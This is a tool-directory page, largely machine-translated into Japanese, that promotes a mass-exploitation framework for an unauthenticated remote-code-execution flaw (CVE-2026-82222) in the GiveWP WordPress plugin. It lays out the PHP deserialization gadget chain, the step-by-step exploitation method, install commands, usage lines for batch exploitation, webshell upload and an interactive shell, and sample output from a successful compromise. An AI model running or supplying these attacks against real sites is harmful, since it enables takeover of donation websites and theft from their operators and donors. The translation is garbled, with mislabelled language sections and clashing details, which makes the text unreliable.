Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-82222 — # CVE-2026-82222用エクスプロイトフレームワーク GiveWP WordPressプラグインにおける認証不要のRCE(リモートコード実行)脆弱性を対象としたエクスプロイトフレームワークです。マススキャン、自動検出、マルチスレッド、JSON/TXT出力、および認可されたテスト用の対話型シェルをサポートしています。 | Kitploit
ツール/GitHubGitHub/ghostlyrootb2h/cve-2026-82222
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテストコマンド&コントロールペイロード開発
GitHubghostlyrootb2h/cve-2026-82222

CVE-2026-82222

# CVE-2026-82222用エクスプロイトフレームワーク GiveWP WordPressプラグインにおける認証不要のRCE(リモートコード実行)脆弱性を対象としたエクスプロイトフレームワークです。マススキャン、自動検出、マルチスレッド、JSON/TXT出力、および認可されたテスト用の対話型シェルをサポートしています。

リポジトリを見る
7時間38分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

⚡ GHOSTLYR00T - GiveWP RCE Exploit Framework

Python Version License Author CVE CVSS

CVE-2026-82222 - GiveWP Unauthenticated RCE Exploit
Mass Scanner + Auto-Detection + Multi-Threading + Interactive Shell


📋 Daftar Isi | Table of Contents

  • Overview
  • Fitur Utama | Key Features
  • Vulnerability Details
  • Instalasi | Installation
Parameter Lengkap | Complete Parameters
  • Contoh Penggunaan | Examples
  • Hasil Scan | Scan Results
  • How It Works
  • FAQ
  • Peringatan | Warning
  • Lisensi | License

  • 🎯 Overview

    GHOSTLYR00T は CVE-2026-82222 のためのエクスプロイトフレームワークです。これは WordPress の GiveWP プラグインにおける PHP オブジェクトインジェクションの脆弱性で、認証なしでの リモートコード実行(RCE)を可能にします。このツールは マススキャン、自動検出、インタラクティブシェルをサポートしています。

    🔴 CVSS 9.8 - CRITICAL

    Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H


    🚀 Fitur Utama | Key Features

    🇮🇩 Bahasa Indonesia

    FiturDeskripsi
    Mass ScanScan ratusan target dari file (-f targets.txt)
    Auto-DetectionDeteksi otomatis form ID, gateway, dan amount donasi
    Multi-ThreadingScan paralel dengan thread configurable (--threads)
    Check ModeFingerprint cepat tanpa exploit (--check)
    JSON OutputExport hasil ke JSON (--json)
    TXT OutputExport hasil ke TXT ringkas (--txt)
    Interactive ShellUpload webshell + terminal interaktif
    Admin EscalationAuto-escalate user ke administrator
    Progress BarMonitor real-time proses scanning
    Colored OutputOutput dengan warna dan format profesional

    🇬🇧 English

    FeatureDescription
    Mass ScanScan hundreds of targets from file (-f targets.txt)
    Auto-DetectionAuto-detects form ID, gateway, and donation amount
    Multi-ThreadingParallel scanning with configurable threads
    Check ModeFast fingerprint without exploitation (--check)
    JSON OutputExport results to JSON (--json)
    TXT OutputExport results to TXT (--txt)
    Interactive ShellUpload webshell + interactive terminal
    Admin EscalationAuto-escalate user to administrator
    Progress BarReal-time scan progress monitoring
    Colored OutputProfessional colored terminal output

    🔍 Vulnerability Details

    CVE-2026-82222 - GiveWP Unauthenticated RCE

    AspekDetail
    Affected VersionsGiveWP <= 4.16.7.1
    Patched VersionsGiveWP >= 4.16.7.2
    Attack VectorNetwork (AV:N)
    Privileges RequiredNone (PR:N)
    ImpactComplete System Compromise

    POP Chain:

    root@kitploit:~
    TCPDF::__destruct()
      -> TCPDF::_destroy(true)
        -> foreach ($this->imagekeys as $file)
          -> Symfony Session::getIterator()
            -> Session::getBag($this->attributeName)
              -> $this->storage->getBag($attributeName)
                -> DonationFactory->__call('getBag', [$attributeName])
                  -> call_user_func_array('system', [$attributeName])
    

    📦 Instalasi | Installation

    🇮🇩 Bahasa Indonesia

    🔧 Persyaratan Sistem

    • OS: Linux / Windows / MacOS
    • Python: Versi 3.8 atau lebih baru
    • Library: requests, urllib3

    📥 Langkah Instalasi

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Tes apakah berhasil
    python3 poc.py -h
    

    🇬🇧 English

    🔧 System Requirements

    • OS: Linux / Windows / MacOS
    • Python: Version 3.8 or higher
    • Libraries: requests, urllib3

    📥 Installation Steps

    root@kitploit:~
    # 1. Clone repository
    git clone https://github.com/GhostlyrootB2H/GHOSTLYR00T.git
    cd GHOSTLYR00T
    
    # 2. Install dependencies
    pip install requests urllib3
    
    # 3. Test if successful
    python3 poc.py -h
    

    🎯 Parameter Lengkap | Complete Parameters

    🇮🇩 Bahasa Indonesia

    ParameterFungsiContoh
    -f, --fileFile target (batch mode)-f targets.txt
    --threadsJumlah thread (default: 4)--threads 10
    --jsonExport hasil ke JSON--json hasil.json
    --txtExport hasil ke TXT--txt hasil.txt
    -c, --commandCommand yang dieksekusi-c "id"
    -g, --gatewayForce gateway tertentu-g stripe
    -a, --amountForce amount donasi-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutTimeout per request (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🇬🇧 English

    ParameterFunctionExample
    -f, --fileTarget file (batch mode)-f targets.txt
    --threadsNumber of threads (default: 4)--threads 10
    --jsonExport results to JSON--json results.json
    --txtExport results to TXT--txt results.txt
    -c, --commandCommand to execute-c "id"
    -g, --gatewayForce specific gateway-g stripe
    -a, --amountForce donation amount-a 25.00
    -t, --triggersRetry attempts (default: 4)-t 5
    --timeoutRequest timeout (default: 30s)--timeout 60
    --checkFingerprint only--check
    --upload-shellUpload webshell--upload-shell
    -i, --interactiveInteractive terminal-i
    -v, --verboseVerbose output-v
    --no-colorDisable colored output--no-color

    🔥 Contoh Penggunaan | Examples

    🇮🇩 Bahasa Indonesia

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt hasil_check.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json hasil.json --txt hasil.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    🇬🇧 English

    1. Single Target

    root@kitploit:~
    python3 poc.py https://target.com -c "id"
    

    2. Batch Scan (Check Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt --check --txt check_results.txt
    

    3. Batch Scan (Exploit Mode)

    root@kitploit:~
    python3 poc.py -f targets.txt -c "id" --threads 5 --json results.json --txt results.txt
    

    4. Interactive Shell

    root@kitploit:~
    python3 poc.py https://target.com -c "id" --upload-shell -i
    

    5. Verbose Mode

    root@kitploit:~
    python3 poc.py https://target.com -c "id" -v
    

    📊 Hasil Scan | Scan Results

    🇮🇩 Bahasa Indonesia

    Terminal Output (Berhasil Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.

    TXT Output (Check Mode)

    root@kitploit:~
    # GiveWP Vulnerability Scan Results (Fingerprint Mode)
    # Generated: 2026-09-09 12:00:00
    # Total: 10 | Vulnerable: 4 | Exploited: 0 | Failed: 6
    #
    # Format: TARGET | VERSION | STATUS
    #
    https://target1.com | 4.15.4 | VULNERABLE
    https://target2.com | 4.14.6 | VULNERABLE
    

    JSON Output

    root@kitploit:~
    {
      "timestamp": 1694265600,
      "mode": "exploit",
      "total": 10,
      "vulnerable": 4,
      "exploited": 3,
      "failed": 7,
      "results": [
        {
          "target": "https://target1.com",
          "status": "exploited",
          "version": "4.15.4",
          "command_output": "uid=33(www-data) gid=33(www-data)"
        }
      ]
    }
    

    🇬🇧 English

    Terminal Output (Successful Exploit)

    root@kitploit:~
    CVE-2026-82222  GiveWP <= 4.16.7.1  unauthenticated RCE  |  PoC v2.2
        target   : https://target.com
        form id  : auto-discover
        command  : id
    
    root@kitploit:~
    + GiveWP 4.15.4 detected (vulnerable).
    + User "a1788868506" registered.
    + Gadget stored in account meta.
    + Discovered 13 form(s).
    + Success! Form 37256 / gateway paypal / amount 1.00
    + Session poisoned (HTTP 500).
    +--- command output --------------------------------------------
    | uid=33(www-data) gid=33(www-data) groups=33(www-data)
    +---------------------------------------------------------------
    

    [+] SUCCESS. The target executed the command.


    ⚙️ How It Works

    🇮🇩 Bahasa Indonesia

    段階的な悪用手順:

    1. フィンガープリント: readme.txt と give.php で GiveWP のバージョンを検出
    2. 登録: give_action=user_register で認証なしにドナーアカウントを作成
    3. ペイロード保存: シリアライズされた PHP オブジェクトを last_name メタデータに保存
    4. フォーム発見: REST API とスクレイピングで寄付フォームを発見
    5. ゲートウェイ/金額の自動検出: 成功するまでゲートウェイと金額の組み合わせをテスト
    6. セッションポイズニング: give_last フィールドなしで寄付を送信し、デシリアライゼーションをトリガー
    7. トリガーとキャプチャ: セッションにアクセスしてペイロードを復活させ、出力をキャプチャ

    自動検出ロジック:

    root@kitploit:~
    # Gateway detection order
    CANDIDATE_GATEWAYS = ['manual', 'offline', 'paypal', 'stripe', 'square',
                          'paypalexpress', 'authorize', 'razorpay', 'mollie']
    

    Amount detection order

    AMOUNT_TESTS = ['0.01', '1.00', '5.00', '10.00', '25.00', '50.00', '100.00', '250.00', '500.00']

    🇬🇧 英語

    段階的な悪用手順:

    1. フィンガープリント: readme.txt と give.php で GiveWP のバージョンを検出
    2. 登録: give_action=user_register でドナーアカウントを作成
    3. ペイロード保存: シリアライズされた PHP オブジェクトを last_name メタデータに保存
    4. フォーム発見: REST API とスクレイピングで寄付フォームを発見
    5. ゲートウェイ/金額の自動検出: 成功するまで組み合わせをテスト
    6. セッションポイズニング: give_last なしで寄付を送信し、デシリアライゼーションをトリガー
    7. トリガーとキャプチャ: セッションにアクセスしてペイロードを復活させ、出力をキャプチャ

    ❓ FAQ

    🇮🇩 インドネシア語

    質問回答
    どの GiveWP バージョンが脆弱ですか?GiveWP <= 4.16.7.1。バージョン 4.16.7.2 以降はパッチ済みです。
    なぜ -a 25 を使うのですか?一部のフォームには最低金額(例: $25)があります。ツールは自動検出しますが、強制することもできます。
    本番環境で使用できますか?いいえ。 許可されたテストのみを対象としています。
    なぜ登録が失敗するのですか(HTTP 200)?ターゲットで登録が無効化されているか、WAF が有効か、バージョンが 4.16.6+ の可能性があります。

    🇬🇧 英語

    質問回答
    どの GiveWP バージョンが脆弱ですか?GiveWP <= 4.16.7.1。バージョン 4.16.7.2 以降はパッチ済みです。
    なぜ -a 25 を使うのですか?一部のフォームには最低金額があります。ツールは自動検出しますが、強制することもできます。
    本番環境で使用できますか?いいえ。 許可されたテストのみを対象としています。
    なぜ登録が失敗するのですか(HTTP 200)?ターゲットで登録が無効化されているか、WAF が有効か、バージョンが 4.16.6+ の可能性があります。

    ⚠️ 警告 | 警告

    ⚠️ 法的警告 ⚠️

    このツールはセキュリティ研究専用です!


    ⚠️ 違法行為: 許可なくサーバーにアクセスすることは犯罪行為です
    ⚠️ 法的リスク: コンピュータ不正アクセス法に違反します
    ⚠️ 許可された使用のみ: 自分のシステムまたは書面による許可を得たテストのみ
    ⚠️ 責任: ユーザーはこのツールの使用について全責任を負います

    賢明かつ責任を持って使用してください!

    ⚠️ 法的警告 ⚠️

    このツールはセキュリティ研究専用です!


    ⚠️ 違法行為: 許可なくサーバーにアクセスすることは犯罪行為です
    ⚠️ 法的リスク: コンピュータ詐欺法に違反します
    ⚠️ 許可された使用のみ: 自分のシステムまたは書面による許可を得たテストのみ
    ⚠️ 責任: ユーザーはこのツールの使用について全責任を負います

    賢明かつ責任を持って使用してください!


    📜 ライセンス | ライセンス

    🇮🇩 インドネシア語

    Copyright © 2026 GhostlyrootB2H
    MIT ライセンスの下で配布されています。

    🇬🇧 英語

    Copyright © 2026 GhostlyrootB2H
    MIT ライセンスの下で配布されています。


    👨‍💻 作者

    GhostlyrootB2H

    🐙 GitHub: @GhostlyrootB2H

    🇮🇩 GHOSTLYR00T をご利用いただきありがとうございます!
    このツールは学習とセキュリティテスト用です。
    違法行為には使用しないでください!

    🇬🇧 GHOSTLYR00T をご利用いただきありがとうございます!
    学習とセキュリティテスト専用です。
    違法行為には使用しないでください!

    ツールをダウンロード